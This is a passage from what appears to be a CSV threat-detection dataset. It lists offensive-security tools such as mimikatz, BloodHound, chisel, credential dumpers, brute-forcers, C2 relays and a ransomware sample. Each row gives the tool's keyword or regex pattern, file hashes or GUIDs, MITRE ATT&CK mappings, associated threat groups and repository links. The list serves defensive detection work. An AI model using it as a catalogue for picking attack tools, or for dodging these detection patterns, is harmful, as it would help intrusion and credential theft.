Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","34386" "*AWS_KMS_KEY_ALIAS=nemesis-dev*",".{0,1000}AWS_KMS_KEY_ALIAS\=nemesis\-dev.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","34387" "*awsloot.py *",".{0,1000}awsloot\.py\s.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","34388" "*axcrypt2john.py*",".{0,1000}axcrypt2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","34389" "*aydinnyunus/PassDetective*",".{0,1000}aydinnyunus\/PassDetective.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","N/A","7","2","129","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z","34390" 
"*azfvgayqKwtFApcvyRedpUXculaeCCGA*",".{0,1000}azfvgayqKwtFApcvyRedpUXculaeCCGA.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","34391" "*azizjon.m@gmail.com*",".{0,1000}azizjon\.m\@gmail\.com.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#email","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","34393" "*Azure-AccessPermissions.ps1*",".{0,1000}Azure\-AccessPermissions\.ps1.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","34394" "*Azure-AccessPermissions-master*",".{0,1000}Azure\-AccessPermissions\-master.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","34395" "*AzureAD AutoLogon 
Brute*",".{0,1000}AzureAD\sAutoLogon\sBrute.{0,1000}","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","0","N/A","N/A","N/A","2","101","20","2024-06-27T12:23:42Z","2021-10-01T05:20:25Z","34396" "*AzureAD_Autologon_Brute*",".{0,1000}AzureAD_Autologon_Brute.{0,1000}","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","1","N/A","N/A","N/A","2","101","20","2024-06-27T12:23:42Z","2021-10-01T05:20:25Z","34397" "*AzureAD_Decrypt_MSOL.ps1*",".{0,1000}AzureAD_Decrypt_MSOL\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","34398" "*azuread_decrypt_msol_*.ps1*",".{0,1000}azuread_decrypt_msol_.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","powershell","method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync","T1003.006","TA0006","N/A","N/A","Credential Access","https://gist.github.com/analyticsearch/7453d22d737e46657eb57c44d5cf4cbb","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","34399" "*AzureADLateralMovement*",".{0,1000}AzureADLateralMovement.{0,1000}","offensive_tool_keyword","AzureADLateralMovement","AzureADLateralMovement allows to build Lateral 
Movement graph for Azure Active Directory entities - Users. Computers. Groups and Roles. Using the Microsoft Graph API AzureADLateralMovement extracts interesting information and builds json files containing Lateral Movement graph data compatible with Bloodhound 2.2.0","T1074 - T1075 - T1076","TA0008 - TA0009 - TA0010","N/A","N/A","Lateral Movement","https://github.com/talmaor/AzureADLateralMovement","1","1","N/A","N/A","N/A","2","122","22","2022-12-08T06:44:48Z","2019-06-22T06:13:28Z","34401" "*AzureADRecon.ps1*",".{0,1000}AzureADRecon\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","34402" "*AzureC2Relay.zip*",".{0,1000}AzureC2Relay\.zip.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","34403" "*AzureC2Relay-main*",".{0,1000}AzureC2Relay\-main.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","34404" "*AzureHound.ps1*",".{0,1000}AzureHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34405" "*azurehound/v2*",".{0,1000}azurehound\/v2.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34406" "*-b bleeding-jumbo*",".{0,1000}\-b\sbleeding\-jumbo.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","34407" "*'B','e','a','c','o','n'*",".{0,1000}\'B\',\'e\',\'a\',\'c\',\'o\',\'n\'.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","34408" "*B00DC126-D32B-429F-9BB5-97AF33BEE0E1*",".{0,1000}B00DC126\-D32B\-429F\-9BB5\-97AF33BEE0E1.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#GUIDproject","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","34411" "*b016e0fb93032d4ab6f2fb2ec6388e3117442d836bed2fe38ae8b73d7b825c5e*",".{0,1000}b016e0fb93032d4ab6f2fb2ec6388e3117442d836bed2fe38ae8b73d7b825c5e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - 
T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34413" "*b016e0fb93032d4ab6f2fb2ec6388e3117442d836bed2fe38ae8b73d7b825c5e*",".{0,1000}b016e0fb93032d4ab6f2fb2ec6388e3117442d836bed2fe38ae8b73d7b825c5e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - 
MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34414" "*b01d196f7d55bb7eb688d1f72d3d238ac95a4822e6712e197f816245d6eadf75*",".{0,1000}b01d196f7d55bb7eb688d1f72d3d238ac95a4822e6712e197f816245d6eadf75.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","34415" "*b035dfbf2f3125fbf0d00f86158efbc4a7c7715f03e4d7bcf634dfd16888e965*",".{0,1000}b035dfbf2f3125fbf0d00f86158efbc4a7c7715f03e4d7bcf634dfd16888e965.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","34417" "*B03A3AF9-9448-43FE-8CEE-5A2C43BFAC86*",".{0,1000}B03A3AF9\-9448\-43FE\-8CEE\-5A2C43BFAC86.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","#GUIDproject","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","34418" "*b051d7e7069a4ec95d14811b1feb6813bb750fd281080ea0e6941ba1119180fb*",".{0,1000}b051d7e7069a4ec95d14811b1feb6813bb750fd281080ea0e6941ba1119180fb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34421" "*b054a5cc8d12e9fedf59d13d0a087f64f598ce4486d35c888b40a2c3d7adf9c5*",".{0,1000}b054a5cc8d12e9fedf59d13d0a087f64f598ce4486d35c888b40a2c3d7adf9c5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34422" "*b0580360a94eff032f2113013124fb7209eb9bfef654841aeac2ebc09cec15c8*",".{0,1000}b0580360a94eff032f2113013124fb7209eb9bfef654841aeac2ebc09cec15c8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34423" "*b05d1b0ab92d9c5cfb3f0db593cc55ba5a4c22dea4cdf731ca8b934a45163ab8*",".{0,1000}b05d1b0ab92d9c5cfb3f0db593cc55ba5a4c22dea4cdf731ca8b934a45163ab8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","34424" "*b0740ed4a5a0d32d2d4081fc2875b6006c8920794463f36e467ac00bcb294d33*",".{0,1000}b0740ed4a5a0d32d2d4081fc2875b6006c8920794463f36e467ac00bcb294d33.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34427" "*b074de2206cbff42293870201e0faf2113986a64fba6cc4682e2a87f518ee7d4*",".{0,1000}b074de2206cbff42293870201e0faf2113986a64fba6cc4682e2a87f518ee7d4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34428" "*b08782b58eb043e7cd649302ceea993582f55762d7b384c418253d227930fe32*",".{0,1000}b08782b58eb043e7cd649302ceea993582f55762d7b384c418253d227930fe32.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34431" "*b095b574cadcf9fc517eedd434df402bdbf680f19ebe0c1298dd8f0818dfe5e8*",".{0,1000}b095b574cadcf9fc517eedd434df402bdbf680f19ebe0c1298dd8f0818dfe5e8.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - 
GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34434" "*b096ce8b9397269012bccaef5a419211cb74d1157d4340453a3a39b68da7cf10*",".{0,1000}b096ce8b9397269012bccaef5a419211cb74d1157d4340453a3a39b68da7cf10.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","#filehash","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","34437" "*b0975e541e34e247e2312f7acc58d9734fbbdc4cda5137e85b3c215c2737f76c*",".{0,1000}b0975e541e34e247e2312f7acc58d9734fbbdc4cda5137e85b3c215c2737f76c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34438" "*b098cae09f215cc8ab24cb98bf217ae55a61704fe0661847341a11656368c7ca*",".{0,1000}b098cae09f215cc8ab24cb98bf217ae55a61704fe0661847341a11656368c7ca.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34439" "*b09a40f998e8bc112841842ed56d8e843e5df98f4b53657098924fd10325a4b9*",".{0,1000}b09a40f998e8bc112841842ed56d8e843e5df98f4b53657098924fd10325a4b9.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","#filehash","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","34440" "*b09adb4d79fd71cba1d5c51c514d4a10e08f92fed9eca3637a2f68d6c2f8e835*",".{0,1000}b09adb4d79fd71cba1d5c51c514d4a10e08f92fed9eca3637a2f68d6c2f8e835.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","34441" "*b0a55532654bbfd0aafa59dfe26b576a095d9ac4a4af2f99bca442a1d87ce29b*",".{0,1000}b0a55532654bbfd0aafa59dfe26b576a095d9ac4a4af2f99bca442a1d87ce29b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34444" "*b0b6fc7655489a38277889cc4a101e8832b49b08e754110bdba599c6c4c9b6ed*",".{0,1000}b0b6fc7655489a38277889cc4a101e8832b49b08e754110bdba599c6c4c9b6ed.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","34445" "*B0C08C11-23C4-495F-B40B-14066F12FAAB*",".{0,1000}B0C08C11\-23C4\-495F\-B40B\-14066F12FAAB.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#GUIDproject","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","34446" "*b0c674b496620842bae84b3e11231c4913ba57e9c4aa9458e670c153a66be810*",".{0,1000}b0c674b496620842bae84b3e11231c4913ba57e9c4aa9458e670c153a66be810.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral 
Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","#filehash","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","34448" "*b0ce61e1952c8156f693be914ac22b377db2c68c0485d38e6dfefa921400dd82*",".{0,1000}b0ce61e1952c8156f693be914ac22b377db2c68c0485d38e6dfefa921400dd82.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","34449" "*b0cef23396325be6652587249d65dbcd53571dc6928350ea297f99ef1b58f920*",".{0,1000}b0cef23396325be6652587249d65dbcd53571dc6928350ea297f99ef1b58f920.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","34450" "*b0cf4ccee3c06fe7d3c7ff2afbfefbe972f82008ec5b2f8a5e5d5cb9a58861a2*",".{0,1000}b0cf4ccee3c06fe7d3c7ff2afbfefbe972f82008ec5b2f8a5e5d5cb9a58861a2.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","34451" 
